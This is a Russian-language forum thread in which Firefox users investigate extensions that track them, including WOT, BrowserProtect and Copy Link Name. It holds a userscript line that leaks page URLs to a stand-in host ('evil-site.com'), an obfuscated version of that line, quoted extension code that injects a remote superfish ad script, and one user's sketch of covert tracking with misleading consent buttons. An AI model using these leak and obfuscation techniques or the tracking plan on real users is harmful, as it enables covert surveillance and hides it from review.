http://www.xakep.ru/post/59936/

Кто что думает? И предлагаю постить названия шпионских расширений.

Про Fasterfox давно писали, что следит. Да и расширение невнятное, очередной супер-пупер ускоритель как бы.

Но Autocopy с виду нормальное, да и статистику ему совсем не зачем отправлять.

...
з.ы. любопытная тема. было бы очень интересно знать в "лицо" скрытых Мата Хари.
надеюсь эта темка не потеряется в анналах истории (только если из-за неактуальности))

Одно дело, когда шпионит что-то вроде mail.ru - этого ждешь. А другое, когда autocopy от которого этого просто не ждешь.

И может кто знает отправляет flashgot статистику анонимно или нет? Вроде есть опция feedback в about:config, но не понятно за что отвечает.

annalemash, Вовсе не обязательно - можно портабельную (то есть не требующую установки - просто положить  папочку с программой в Program Files , Мои документы или куда-то ещё - на выбор ) версию того же уже с подрезанными крыльями хранить на флешке или например в облачном хранилище

Согласен.Так и происходит сейчас

Отсутствие этой опции ни о чём не говорило бы.
Насчёт Autocopy: используйте старые версии. Есть дата, когда оно было продано?

Ничего себе. Это же кейлоггер почти.
Например, Вы сильно бы доверяли программам от СБУ (Служба безпеки України, Служба безопасности Украины), если бы Вам их не тихо, а явно предложили бы поставить?
А в этом случае — чаще копируйте с Autocopy пароли!
А от mail.ru ждёшь в той степени, в какой раньше они были некачественны и неоригинальны (до сих пор). Человек субъективен.

27-02-2013 22:47:38
Надеюсь, AutoCopy 2 не продано?

Создал FAQ http://forum.mozilla-russia.org/viewtopic.php?id=58209

Тогда уж и WOT нужно заносить в такой список или создать список «НЕ рекомендуемых для анонимности расширений», а то многие политики безопасности на английском и вообще не понятно, что они там пишут.

WOT вполне себе явно создаёт в about:config идентифицирующее пользователя ключи:
user_pref("weboftrust.extension_id", "b2b5l8q4z7n6k9k6j0k2d9h1w9t9k3t8i7k4r8b1");
user_pref("weboftrust.witness_id", "2f7w2w2m9s1k7j4p9l1r6w3e9s9i1p9s6s2o2e9p");
user_pref("weboftrust.witness_key", "g1d6o6g5v2z1k4o8i3r9n8k5k6y6b8w1m8q7t3s9");

И записывает часовой пояс пользователя:
user_pref("weboftrust.firstrun_time", "Mon Jan 17 2012 00:00:00 GMT+0400");

В политике приватности явно сообщается об этих идентификаторах, но она написана на буржуйском и мало кто её читает, так же там прямо сообщают, что по запросу компетентных органов сдадут с потрохами всю инфу о посещённых пользователем сайтах.
И ладно бы WOT использовал эти ID при выставлении пользователем оценок сайтам, но он же его отсылает при каждом посещении ресурсов, в чём, общем-то, как бы никакой необходимости нет, т.к. рейтинг сайта можно загружать и не отправляя информацию о пользователе, в общем палево... Но людям, судя по всему, нравится...

А может кто подскажет? Про этого автора и его продукты: https://addons.mozilla.org/ru/firefox/a … l-watcher/ , не шпионят ли ?

Дык если ты пользуешься гуглопочтой, то чего тебе волноваться? Даже если и следит, подумаешь одним шпионом будет больше, одним меньше, что из того?

Пользуюсь, гуглопочта такая-растакая или я такой. С
поссорила, никак не настраивается. А это расширение подозревается в тормозах

Пару лет назад искал подобные функции и хотел было использовать Autocopy (addon), но засомневался именно по этой причине, и благо набрел на кнопку уважаемого bunda1 Autocopy+3 (custom buttons), да с лучшим функционалом.

Zaycoff
оПА-НА! СПАсибо за инфу! Только вот аналога нету этому

Использую, ничего не тормозит и тормозить там вовсе нечему.

Я гляжу тут много людей, кто свои почтовые сервера держат)

Да я вернулся к веб-интерфейсу пока что.

А в чём смысл этой приблуды? Ну даст она мне высокий рейтинг доверия для какого-то сайта. Ок. И чо?

У сайта мегафона в WOT вполне себе «Превосходный» рейтинг, а от них уже не раз утекали личная переписка пользователей. Кому верить честным рейтингам WOTa или наглым, лживым журналистам?

Для сайтов подавляющего большинства госучреждений рейтинг максимален, особенно впечатляет максимальное значение конфиденциальности, при том, что почти все эти сайты пашут без SSL/TLS и данные пользователей гуляют в открытом виде...

105% порнушных сайтов имеют рейтинги WOT хуже некуда, но там всё чисто и максимум должен стоять рейтиг «Не для детей».

В общем это дополнение даёт пользователю только ложное чувство безопасности и запугивает там где не нужно, т.е. в целом бесполезно.

Если уж так хочется проверять ссылки, то стоит поставить что-то из серии «Проверка ссылок антивирусом Dr.Web», оно хотя бы проверяет, а не пишет от балды, что сайт «хороший»
Правда не знаю стучит ли Dr.Web, но по идее ID пользователя он не должен отсылать, там в политике приватности пишут только об IP...

А подскажите по поводу userscript-ов для Greasemonkey, есть ли возможность через них отслеживать, получить доступ к кукам, истории, закладкам, как-то навредить?

vom
Можно утащить куки и пароль с текущего сайта.
И можно куда-нибудь отправлять информацию о посещаемых страницах (на которых работает скрипт).

Infocatcher
Ясно, так и думал, но когда много установок, весьма вероятно, опытные участники прошерстили код, здесь это попроще, а вот с минимумом. Тем более, он ведь может работать не только с декларируемым сайтом.

Может кто-то использует вот этот Dollchan Extension Tools?

Запускаться будет только на прописанных сайтах.
Но получать/отправлять данные можно откуда/куда угодно.

Infocatcher
Я к тому, что может быть прописано несколько сайтов, разобрать код неопытному пользователю не представляется возможным.

7,5 тысяч строк? Сомнительно как-то, что кто-то будет все проверять.
Скорее по вторичным признакам кто-нибудь (случайно) обнаружит. Если есть, что обнаруживать.

Пора запускать манифесты и регулировать права расширений, как на Андроиде, только там с этим всё работает через зад, но выглядеть должно так же как-то.

Infocatcher
Я не про этот скрипт, а про те, где по миллиону, сотне тысяч установок. А про этот, имел ввиду, может кто-то пользуется. И думал, возможно есть какие-то методики быстрой проверки, например по доменам.

28-02-2013 23:16:14
KooL
В данном случае это не такая серьезная проблема, ее почти и нет для подавляющего большинства, чтобы реализовывать.

vom
Я понял.
Быстрая проверка – это если код не пытались прятать. Тогда надо проверять вызовы GM_xmlhttpRequest(), создание изображений, скриптов, стилей (всего, что может грузиться извне).
Но одно дело найти

new Image().src = "http://evil-site.com/track.php?url=" + encodeURIComponent(location.href);

И совсем другое, когда там что-нибудь вроде

new I\u006dage()["sr" + "c"] = "http://evil-site.com/track.php?url=" + encode\u0055RIComponent(location.href);

vom
Нормальная проблема, скоро ФФ будет по умолчанию блокировать все сторонние куки, а из-за этого что-то может не работать даже на сайтах.

Infocatcher
Спасибо за ликбез, не представлял даже, что такое возможно. Ну если нет доступа к закладкам, истории, кукам от других сайтов, вряд ли это кому-нибудь понадобится.
KooL
Ну в смартфонах принципиальная проблема, т.к. можно быстро заработать, вывев деньги со счета. А насчет кук, в основном то все работает, и для гигантов рынка то всеравно оставят их.

Вот перекупит кто нибудь адблок с носкриптом и прощай фаерфокс. Печально.

Здравствуй Lynx?

Сомневаюсь, что их продадут, уж слишком популярны, наверняка  неплохой донат идёт от пользователей (NoScript по умолчанию просит 15$, а Adblock Plus - 5$, они бы столько не просили, если бы народ не жертвовал). Думаю и Mozilla Foundation им маленько приплачивает.

Притом  эти дополнения опенсорс: NoScript - GPLv2, Adblock Plus - GPLv3, даже если их и продадут, то найдутся те, кто подхватит знамя и сделают нечто другое на их основе.

Лучше уж , в принципе для него есть неплохой аналог NoScript (мне он даже больше нравится, чем оригинальный NoScript), называется ScriptSafe, а вот с адблоком там похуже, то что сделали для хромого явно не дотягивает до версии под

Там расширения не следят?

Может и следят, нужно читать политики приватности...

Но в любом случае Lynx - это не выход, слишком много сайтов отвалится, т.к. с поддержкой стандартов у него фигова-то...

Тогда остаётся только юзать голый или с политиками запрещения по умолчанию на приём куков и запуск скриптов - у них хотя бы это можно, и разрешать их для каждого сайта индивидуально (правда весь мозг вынесет запросами на запуск каждого скрипта по отдельности)
вот только не знаю стучит в центр или нет?

Я знаю.

Популярность фаерфокс пострадает.

Здравствуй опера, опять.

Можно у автора купить права на программу, потом сменить лицензию, закрыть исходники и всё.

Сменить лицензию можно только для новых версий, лень смотреть как там разработки ведутся, но если есть коммиты от сторонних авторов, то нужно согласие каждого, кто хоть строчку написал и она была использована. Да и закрыть исходники тут непросто.

Опера не следит, ога.

Там их вообще не проверяют.

Ps. И вообще господа, не узайте хромоги, от них тупеют.

Кстати от расширениях, сменивших автора.

http://www.captaincaveman.nl/news-devel … bsubid=100
Расширения: http://www.captaincaveman.nl/firefox-extensions.aspx
Профиль на AMO: https://addons.mozilla.org/firefox/user/620/

Теперь часть перешла к некому (кой?) ppclick.
Смотрим и видим в большинстве расширений подобный код:
https://addons.mozilla.org/firefox/file … y.js#L1416 (тут, правда, другой автор был, но код других расширений не посмотреть онлайн)

//installing first time
var EUObjIEView = {
    SetExistingUser : function() {
        var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch);
        
        try{    
            prefManager.getBoolPref("extensions.ieview.use");
        }
        catch(ex) {
            prefManager.setBoolPref("extensions.ieview.use", true);
        }
    }
}
setTimeout(function() { EUObjIEView.SetExistingUser() }, 2000);

При этом выставляемая настройка (в данном случае extensions.ieview.use) больше нигде не используется.
Вот зачем это может быть нужно?
Настройка останется после удаления расширения, но что это даст?

И это не считая создания никому не нужного глобального объекта.

В общем-то ничего такого, но очень странно.

Совсем забыл про экспериментальные версии.
Вот это уже интереснее:
https://addons.mozilla.org/firefox/file … y.js#L1414

02-03-2013 00:23:43
На первый взгляд, встраивает опциональную, вроде как, рекламу. В первый раз открывает http://360addons.com/ieview.htm.

Infocatcher
А вы кликаете по кнопочке "Жалоба" для таких расширений?

geczu
А это запрещено? Где соответствующий пункт правил?

02-03-2013 15:07:39
У них даже вот такое есть:

А что думаете по поводу платных расширений, почему такого нет?

Кто же будет платить, когда вон там вот куча бесплатных? Видимо, выгоднее встраивать рекламу в «чужие» и бесплатные.
А платные есть, но, кажется, все с бесплатной упрощенной версией:
Pearl Crescent Page Saver Basic
FireShot
Quicktext

По аналогии с Андроидом, есть Маркет, а есть, например, 4пда. Но платят ведь. К тому же берём в учёт страны, которые платят, то есть США, Япония, Южная Корея.

4pda получает основной доход пиратства. Он вроде собирается свой магазин открыть, как только на него надавят он быстренько сдуется. Или, если начнёт легализоваться, то тоже прикроет пиратство. На некоторых его страницах такое уже есть, там запрещено публиковать ключи и ломанный софт.
Да там еще есть бесплатные программы, программы с xda, инструкции по root и прошивки. Но многие инструкции завязаны на платный софт, который лежит там ломанным.

И ничто конечно же не мешает мозиле кроме репутации сделать все платным. Для большинства хватит простенького открытого кода. Обычный пользователь поленится ломать что-то.

08-04-2013 12:33:31
А Mozilla, если там есть грамотный менеджер должна ужесточить политику сбора статистики. Например: включаться соединение должно только с согласия пользователя.

При обыске сдадут в любом случае. А вообще я не считаю ВОТ вредным расширением.

А оно не вредное, оно просто сообщает в дата-центр о каждой посещённой пользователем страничке, притом сообщая его уникальный id без особой на то необходимости, т.е. фактически добавляет в функционал от , притом хромой уже частично отказался от такой практики, а в , благодаря WOT, она появилась...

Но ведь и незаменимое, с таким функционалом больше нет расширений (чтоб маской плохой сайт перекрывало)  или я ошибаюсь?

Канешно незаменимое.
Оно всем сайтам укоза (теперь уже и .народа) даёт превосходный рейтинг, несмотря на то, что там хрени всякой просто немеряно - это называется «унаследованные рейтинги», раз корневой домен кошерный, то все остальные тоже, а на вирусню и парнуху плевать. >_<'

okkamas_knife
Так я о чём и говорю!
Стадо хомячкоф выставило для www.exаmрlе.cоm рейтинг «превосходно», а то, что там куча вирусни и хз чего, им по барабану, главное котики бегают, лайки ставятся, а тут ещё и WOT радостно сообщает, что сайт «безопасный»... И ничтоже сумняшеся, юзверь радостно скачивает программу для ускорения интернета, расшаривания нижней чакры и выхода в астрал, а потом охренело орёт на форумах: «Винда не грузится!!! Мазила не открывает сайты!!! Фсе фотки прапали!!! Чо делать??? Памагите хоть хто-нибуть!!!»

По моему личному мнению, WOT скрорее вреден, чем полезен, т.к. создаёт у пользователя ложное чувство защищённости и от реальных опасностей не защищает. При этом пользователь расслабляется и перестаёт думать головой, что в критической ситуации выходит боком.
Полноценный антивирус куда полезней для копа чем это непонятное поделие... ещё можно было бы понять, если бы WOT проверял ссылки антивирусом, но он этого не делает (хотя что ему мешает скорешиться с Virustotal и предоставлять реальную защиту, а не какие-то левые рейтинги?..

япогс
Чтобы маской плохой сайт перекрывало — полно, а со столь обширной базой оценённых сайтов — нет.

Кстати, вместо WOT можно использовать Flagfox, оно само запрашивает рейтинги WOT (не отправляя при этом уникального id пользователя) и ещё кучи других систем, включая возможность проверки сайта и страницы при помощи McAfee SiteAdvisor, также можно добавить свои действия с сайтом (например, проверку страницы через VirusTotal)

Оно автоматом этого не делает, нужно тыкать контекстное меню, там тыкать, потом тебя отправят на сайт грузить страничку.

Какая замена существует для

DoNotTrackMe: Online Privacy Protection
MaskMe
DeleteMe
Targeted Advertising Cookie Opt-Out (TACO)
PrivacySuite?

03-07-2013 12:57:51
Palemoon не шпионет?

С добрый десяток наберется. Сам предпочитаю подписки для АВР.

Разве не одно и то же?

Я не спец, я нашёл FAQ http://forum.mozilla-russia.org/viewtopic.php?id=58209

Но, например, что использовать вместо DoNotTrackMe: Online Privacy Protection, то есть самая близкая по "мощности" альтернатива, там не сказано.

А почему вы не доверяете Abine, и по какой причине станете доверять кому-то другому?

https://disconnect.me/
http://privdog.com/
http://www.avg.com/ru-ru/do-not-track
https://addons.mozilla.org/en-US/firefo … not-track/

Для Adblock Plus.
https://adblockplus.org/ru/features#tracking

Abine - они собирают личную информацию пользователей, и к тому же сдадут вас, если что.
Расширения против сбора сайтами статистики о пользователях, сами собирают статистику о пользователях - мне это не нравится.

Они скорее всего все собирают.   Изучайте Privacy Policy.

Тогда остается единственный вариант - фильтры для Adblock Plus.

Есть ещё вариант:
Собрать коллекцию альтернатив подобным расширениям, код которых будет иметь открытую лицензию.
Внести правки в код расширений, удалить сбор статистики, отправку любой информации, в том числе о падениях итд.
А затем сделать сборку Firefox.

А затем разрабы перекроят весь API и все эти дополнения отвалятся, а чинить их будет некому...

Вам же дали дельный совет - поставить подписки адблока для приватности, а чтобы куками не палиться - поставить любое расширения для работы с пиченьками, например, Cookie Monster

Стандартных настроек для кук хватает же или нет?

К сожалению не хватает, уж больно через одно место всё сделано, в том же хромом можно отключить приём куков, но при этом на сайте, который их требует, появится уведомление в адресной строке -  типа «этот сайт запрашивает установку куков», кликнув по которому их можно разрешить, а в лисе нужно лезть чёрти куда, чтобы прописать разрешение...

network.cookie.lifetimePolicy;1
лезть черти куда не надо, а в старый добрый about:config. И вдобавок еще настройки кук - Cookies Preferences in Mozilla.

Как-будто каждую минуту новый сайт в исключения добавляется)

Прикольно, не знал, но уж больно топорно сделано, выскакивает алерт и нужно сделать выбор, а я ещё не знаю буду я тут логиниться или нет, а при каждом переходе алерт выскакивает по новой и жутко бесит...
всё-таки в хромом это боле грамотно сделали (висит себе в адресной строке значок-пиченька и ничего не просит, когда потребуется можно активировать, правда и там не без косяков, можно только разрешить или запретить, на сессию разрешение выдать не получится)

Подтвердите мои опасения? Расширение BrowserProtect  https://addons.mozilla.org/RU/firefox/a … erprotect/ после каждой блокировки перебрасывает в facebook, причем галочка "поделиться в facebook" не снимается (возвращается на мето сама).

Или это баг?

И так, встречаем еще один навязчивый сборщик статистики, при этом, что интересно, не отключаемый сбор статистики.
BrowserProtect при каждой блокировке шлёт запрос на свой сайт.

00:00:04.460    0.681    880    260    POST    200    text/html    http://www.browserprotect.org/getSeverity.php
00:00:15.256    0.689    754    249    GET    200    text/html    http://www.browserprotect.org/blacklist.php?t=2&n=http://www.bing.com/search::http://www.google.com/search&o=http://www.bing.com/search&a=false

15-08-2013 17:12:52
Просьба недовольным не забыть минусовать рейтинг глупого автора с комментами почему.

15-08-2013 17:14:33
Лицензия у него GNU 3 поэтому, если тут есть программисты они могут сделать копию BrowserProtect, но без слежения.

Переписал тему в FAQ, обратите внимание.

Пандёнок
http://forum.mozilla-russia.org/viewtopic.php?id=58209
Нужно еще добавить, что большинство Политик приватности написаны на английском, хотя сама страница и описание дополнения переведено. Такая вот несправедливость.

Сразу в начале статьи можно написать, что название Внимание! Шпионские дополнения и их аналоги сделано таким для привлечения внимания и по закону они не являются шпионскими.

Добавить просьбу к программистам.
BrowserProtect под лицензией GNU General Public License, версия 3.0 просто сделать копию этого дополнения отключив функции отправки и переброса на страницу facebook. Причём они могут это делать постоянно с выходом новых версий пока лицензия остаётся той же.

BlockSite тоже под GNU General Public License, версия 3.0 если найдется программист, которой будет копипастить дополнения Wips.com s.r.o. и резать оттуда сбор статистики это будет прикольно.

К поисковым плагинам добавить https://addons.mozilla.org/ru/firefox/a … earch-bar/ в которой можно создавать самому.

В NoScript есть функция http://noscript.net/abe/ включена по умолчанию, описана в Политике приватности. Фактически с ней NoScript тоже попадает в список темы.

Счётчик попаданий в AdBlock Plus.

В Flagfox отправка запроса требуется не "вроде бы", а точно. Другим способом это сделать нельзя, только подключившись к базе данных и стянув оттуда информацию о IP, причём нету гарантий, что она верная (могут ошибиться, не вовремя обновить, составителей базы могут обмануть).
WOT в этом плане ничем не отличается от Flagfox, разве что на сервер WOT передастся еще и информация о отношении пользователя к сайту.

Использование Flagfox ничем не отличается от входа на сайт типа WHOIS и вбивание адреса сайта в поле "узнать о сайте".

Откройте это расширение любым zip архиватором - там в каталоге \ipdb есть два файлика ip4.db и ip6.db...

Кто силён в английском и NoScript, переведите, что такое abe. Adblock Plus опасен не более, чем журнал, поскольку никуда ничего не отправляет.

Идея стоящая за ABE модулем - уплотнение веб приложения ориентированное на защиту предоставляемую но скрипт фаерволоподобным компонентом запущенным в браузере. Этот "Фаервол" специализирован ограждать и защищать границы для каждого чувствительного веб приложения ценного для пользователя, следующего политике определенной  пользователем (тут что-то упустил), или веб-разработчика/администратора или довернной третьей стороны.

Правила ABE удобны.
(идут правила)

Но дальше я переводить не стал, потому что нашел нужный кусок в описании политики:

(Почему-то при копировании с сайта мозилы постоянно ломается форматирование)

В общем суть в том, что существует некая аттака на (WAN ) IP (WAN это сети охватывающие какие-то большие территории). Эта аттака привязывает чужой DNS вместо настоящего и направлена на внешний WAN IP. Для защиты от такой аттаки необходимо знать настоящий внешний (WAN) IP и для его определение постоянно отправляются запросы на https://secure.informaction.com/ipecho

То есть эта штука делает примерно то, что flagfox и подобные только не отправляет адрес посещённого сайта.
С точки зрения безопасности. Владелец NoScript, те кто его взломал или получил разрешение на прослушку, или принудил к сотрудничеству (смотрите Гугл и PRISM, достаточно заявиться с нужной бумажкой):
1. Знают когда вы в сети. (время запроса) Да, это знает провайдер, но тут будет знать, что вы пользуетесь NoScript + Firefox и именно с него выходите. Например не так давно США использовало эксплоит специально против . Так что знание версии браузера это много. Может это и параноидальные мысли, но на практике аттаки уже применяются.
2. Тоже самое будут знать взломщики.

Больше пока в голову ничего не приходит. Единственный реальный сценарий это правительственный эксплоит. В условиях нынешней истерии вокруг хакеров и It я бы поставил на массовый эксплоит.

В самом же ABE я еще не разобрался, похоже это правила для доменов с веб приложениями. То есть там устанавливаются правила для сайтов таких приложений.

А вот в Tor ABE отключен. Подозреваю потому что в Tor свой механизм фильтрации и свои правила, это чтобы они не конфликтовали.

Наш следующий кандидат Copy Link Name https://addons.mozilla.org/ru/firefox/a … link-name/
С очень интересной политикой приватности.

Новый разработчик-шпион https://addons.mozilla.org/ru/firefox/user/ppclick/
Скупил уже два отличных дополнения и встроил сбор информации Copy Link Name и Quick Locale Switcher и еще FabTabs с 22 000 пользователей. Из политики приватности:

Это не вся копипаста, там ниже написано очень много чего еще. Там есть примечание "вы можете отказаться", но не совсем ясно, как это происходит.

Как я понял информация собирается то ли при входе на сайты из списка по ссылке и все дочерние сервисы, то ли происходит перенаправление время от времени. В опциях нету отключения опции сбора статистики, есть только опция "сравнить цены". Из того, что в политике написано "вы можете отказаться" делаю вывод, что опция включена по умолчанию и в настройках вряд ли это она (в настройках отключена по умолчанию, да и противоречит логике засовывать рекламу туда, где её никто не заметит).
Информации, которая "не персональная" по мнению разработчика это все от версии браузера, операционки, Ip, провайдера и может еще чего похоже собирается всегда, потому что надписи "вы можете отказаться" я не вижу.

lilololilt
И ещё Email This Image.

30-08-2013 16:36:26
Что подскажете вместо Quick Locale Switcher?

Locale Switcher...

Может кому будет не лень изучить что именно они сделали? А то может вы опять панику поднимаете на ровном месте, как это было с Ghostery? Мне лезть и смотреть в то, чем я не пользуюсь, как-то лень. -_-

lilololilt
У Quick Locale Switcher пользователей и вовсе почти 200 000. FabTab на его фоне уже мелочь.

Lain_13
Ну так они же всё в политике написали, даже если в коде этого нету, то может прилететь с обновлением и будет соответствовать описанному в политике. Приведённых цитат не достаточно?

30-08-2013 20:03:47
Там в комментах уже несколько человек влепили единицы с пояснением "появилась реклама".

30-08-2013 20:07:48
Есть одно правило. Если на странце есть "Политика приватности", то дополнение может отправлять статистику или как-то использует сеть. Но в любом случае есть исходящие запросы и ответ от них. Например в случае NoScript простое определение IP.
Весь вопрос в том, "отключаемая она?" и "включена по умолчанию?".

30-08-2013 20:19:26
Есть еще косвенные факты подтверждающие, то что их скупили с целью рекламы:
1. Это произошло слишком быстро и одним и тем же пользователем.
2. Изменение политики.
3. Политика приватности в дополнении, где передачи данных в сеть не должно быть в принципе. В случае Ghostery это хотя бы оправдано.

lilololilt
Если я правильно понял, то эта политика приватности связана со сбором личных данных о пользователях при посещении ими сайта компании, а не при использовании расширений. Т.е. если ты зайдёшь к ним на сайт они запишут твой UA, IP и выяснят провайдера через WHOIS, и прочее, что все и так пишут. А если ты зарегистрируешь у них профиль и сообщишь им свой пол, имя и дату рождения, то они могут воспользоваться и этой информацией — в конце-концов тебя предупредили и ты сам им её сообщил.

Даже если это относится и к их расширениям (что, вроде, там указывается в заголовке), то они чётко написали, что пользователь должен самостоятельно раскрыть им свои личные данные если он хочет это сделать, а раздел об общих данных и печеньках прописан исключительно для их сайта и к «продуктам и сервисам» отношения не имеет.

Вот я и предлагаю кому-нибудь из здесь присутствующих взять тот же Quick Locale Switcher и разробрать его по частям, а не языком молоть.
Я этого делать не буду — мне лень.

Lain_13
Даже их Non-personal identification information уже хватает, чтобы классифицировать, как явный сбор статистики. Я вот не хочу светиться, как елка на их сайтах, дочерних сервисах или на сайтах у которых есть их фрейм: у большинства нету такого расширения, а у меня есть.
Да и как-то странно безобидно получается. Зачем такая политика, если по факту ничего не собирается? Количество пользователей можно смотреть на AMO, данные онни и так у себя хранят, user agent и так приходит. Зачем тогда им "Политика приватности"?

Конечно будет интересно, если кто-то разберёт, что внутри. Но мне хватит и этого.

lilololilt
Да ты на всех сайтах как ёлка светишься если не пользуешься Tor Browser. Практически любой сайт собирает статистику. Разве что многие пользуются услугами посредников. Расширения тут не при чём и для сбора такой статистики они даром не нужны. Лучше адблок поставь если ещё не поставил с блокировкой счётчиков, раз тебя это волнует.

> Вот посмотрел код, с виду совсем никаких дополнительных обращений (если не замаскировано), а пункт-то в настройках есть. Понял, что не пойму.

Где ты у Copy Link Name нашёл настройки лучше расскажи. -_-
Ничего даже скрытого в коде нет.

okkamas_knife
А ты слышал, что Земля плоская и если поехать в Израиль, то можно упасть с края?
Слухи это слухи. Одна бабка сказала, вторая ослышалась, третья додумала, четвёртая в это время и вовсе спала, но своего наплела.
Давайте фактами оперировать. Расширения это не колбаса, которую в хим-лаборатории только проверить могут.

Все компании, которые в каком-либо виде собирают статистику, обязаны предоставлять свою политику приватности, в которой они должны чётко сообщить какие данные они собирают о пользователях, как именно и зачем. Они это и сделали. Им вовсе не обязательно для этого встраивать код в расширение. Они просто обязаны предоставить данные о том, что они собирают.

okkamas_knife
Вообще-то любой официальный документ имеет силу только на языке оригинала, а переводы должны утверждаться отдельно и это будет уже другой документ. Это связано с тем, что слова перевода могут толковаться иначе, чем слова оригинала, хотя в общем и целом будут иметь тот же смысл. Это касается даже лицензии GPL. Ты не можешь просто взять и перевести её на удобный тебе язык. Корректно её толковать можно только на языке оригинала — английском. Так что да, ты имеешь полное право написать свою политику приватности на клингонском, если тебе так хочется, и толковать её можно будет только на клингонском. В случае чего будет крайне занимательное судебное разбирательство.

Если есть варианты, то, конечно, можно выбрать, но это тема о компаниях, которые «шпионят» за своими пользователями включив специальный код в тело расширений и пока не похоже, что это именно тот случай. Даже случай с Ghostery был ближе — там-то код явно есть, хоть он и выключен по-умолчанию. Тут же — «охосспади, они следят за мной через фрейм на своих сайтах». При чём тут расширения?

Lain_13

На странице дополнении кнопка Options, нажимаешь и там место для галочки и надпись "Use price comparison".

Я уже писал, но повторюсь. Их "Политика приватности" уже написана и ничто не мешает при следующем обновлении поменять код полностью соответствующий ей. В политике нету строгости и описания способов сбора, да и фреймы с их сайтами, которые вроде тоже сайт и могут многое натворить.
Зачем мне могущий приплыть с обновлением счетчик не известной степени сложности и устройства в ?

Кроме того, косвенные факты покупки и смены политики уже очень подозрительны. А странность с никому не нужной статистикой странна. Это однозначно подготовка к изменению кода. Просто, если рассуждать логически, только явная реклама превышающая возможности обычных скриптов на сайтах может заставить разработчика написать такую политику. Если даже она не появится, то в возможных планах она есть.

P. S. С чего вы взяли, что я пользуюсь TorBrowser? К тому же его пользователей много, а недавно эта цифра выросла в 2 раза. И там в отличии от все заточено под скрытие, даже поставив темку с AMO я свечусь больше чем с ним.
Про елку я утрировал. Любому человеку чисто психологически не приятно, что что-то там може писать при определённых условиях его статистику в самом .

lilololilt
Ага, кажется вижу. Это версия 1.3.5.5, которая не подтверждена (и, похоже, никогда не будет):

Офигеть полезную опцию запилили… Что ещё более полезного можно было засунуть в расширение для копирования текста со ссылок, которое уже успешно это делает? О_о

Теперь я не возражаю. Такое не стоит трогать даже трёхметровой палкой, даже если оно выключено по-умолчанию.

Вот код добавляющий мусор:

addEventListener('DOMContentLoaded', function loadedContent(aEvent) { // on page load
    with(content) {
         if (aEvent.originalTarget.location.href != null) {
             if (aEvent.originalTarget.location.href == document.location.href && document.location.href != 'about:home' && (document.location.href.indexOf('https:') == -1) ) {
                var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch);
                var use = prefManager.getBoolPref("extensions.cln.useWizeShoppy");
                if( use )
                {
                    var el_exist = document.getElementById('scr_xsale');
                    if(el_exist)
                    {
                        removeEventListener('DOMContentLoaded', loadedContent, false);
                        return;
                    }    
                    var script = document.createElement('script');
                    script.setAttribute('type',    'text/javascript');
                    script.setAttribute('charset', 'UTF-8');
                    script.setAttribute('id','scr_xsale');
                    script.src = 'http://www.superfish.com/ws/sf_main.jsp?dlsource=fgzqxwui&userId=c4aa8323-83ff-4385-a2df-d45f8c1ce97a&CTID=cln';
                    document.getElementsByTagName('head')[0].appendChild(script);
                    
                    removeEventListener('DOMContentLoaded', loadedContent, false);
                }
            }
         }
         removeEventListener('DOMContentLoaded', loadedContent, false);
    }
    removeEventListener('DOMContentLoaded', loadedContent, false);
}, true);

А вот из

onPageLoad: function(aEvent) {
    var appcontent = document.getElementById("appcontent");

    var doc = aEvent.originalTarget;
    var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch);
    var currentURL = doc.documentURI.toString();
    if (currentURL.indexOf("https:") == -1) {
        var use = false;
        try {
            use = prefManager.getBoolPref("extensions.cln.useWizeShoppy");
        } catch(e) { use = false; }
        if( use )
        {
            window.messageManager.loadFrameScript("chrome://cln/content/content.js", false);
            
            if(appcontent) {
                appcontent.removeEventListener("DOMContentLoaded", headReplacer.onPageLoad, true);
            }
        }else
        {
            window.messageManager.removeDelayedFrameScript("chrome://cln/content/content.js");
        }
    }

Обратите внимание, как они старательно проверяют везде, что extensions.cln.useWizeShoppy установлено. Да уж, с таким счастьем лучше три раза перестраховаться.

А вот этот код отвечает за настройку:

var need_usage = prefManager.getBoolPref("extensions.cln.useWizeShoppy");
            
        $("#clnOptions_enable_inject").attr( "checked", need_usage );
        
        var set_qlauncher_controls_state = function()
        {
            prefManager.setBoolPref("extensions.cln.useWizeShoppy", $("#clnOptions_enable_inject").attr( "checked"));
        };

Вроде всё.

Итого:
* Опция не установлена по-умолчанию.
* Если она установлена, то на все веб-страницы вставляется какой-то скрипт, который у меня нет ни какого желания разбирать.
* Само расширение статистики не собирает и никуда не отсылает (более чем достаточно скрипта, если пользователь его разрешит).

Блин, таки опять закончилось тем, что скрипт разрбрал я.

p.s. А про Tor Browser я и не предполагал, что ты им пользуешься. Я сказал, что если ты им не пользуешься, то говорить о приватности при посещении сайтов несколько странно.
Вот только то, что делает это расширение если в нём разрешить их скрипт, куда хуже.

Lain_13

И это пока не отсылает, а код с отсыкой "не персональной информации может прилететь в любой момент".

Так написана лицензия Mozilla Public License Version 1.1. На сколько законно будет просто скопировать расширение, удалить мусорный код и перезалить на AMO? И еще интересно, первые версии этого расширения были под той же лицензией?

Замена Copy Link Name - Copy Link Text https://addons.mozilla.org/en-us/firefo … text-4750/
Даже больше функций, может копировать текст и/или значения (атрибут value) кнопок, меню и других элементов форм. Опционально может давать доступ к полям паролей.

okkamas_knife
Но таки опять закончилось тем, что по-умолчанию дрянь выключена и даже не доступна для установки в данном случае.

lilololilt
> И это пока не отсылает, а код с отсыкой "не персональной информации может прилететь в любой момент".
За такие фокусы их смычным пинком с AMO выгонят — Мозилловцы таких шуток не любят.

Lain_13

Ну так политике соответствует то. Я про "не персональные данные", вроде операционки, IP, времени на компе и так далее. Но разные случаи я рассмотрел уже.
Интересно, конечно, что произойдёт, если трактовать политику шире. Можно сделать код так, что формально под политику подпадает, но собирает больше чем думает пользователь.

Если бы я делал:
1. Посчитал бы за "свой сайт" с которого капают данные все на которых мои фреймы.
2. Тихо договорился с такими сайтами и сложил их инфу со своей.
3. На всякий случай (при блокировке AdBlock Plus, Ghostery, скриптами или аналогами) вставлял бы на сайты вставки сигнализирующие, что тут должен быть мой фрейм. Так даже в случае блокировки дополнение вело бы себя так, как будто фрейм не заблокирован.
4. Сделал бы максимально простым ввод инфы и клик на кнопку "Согласен", кнопка "Не согласен" была бы еле видна.
5. В не персональные данные включил бы плагины, разрешение монитора, локальное время, считал бы примерное время выхода и нахождения в сети.

lilololilt
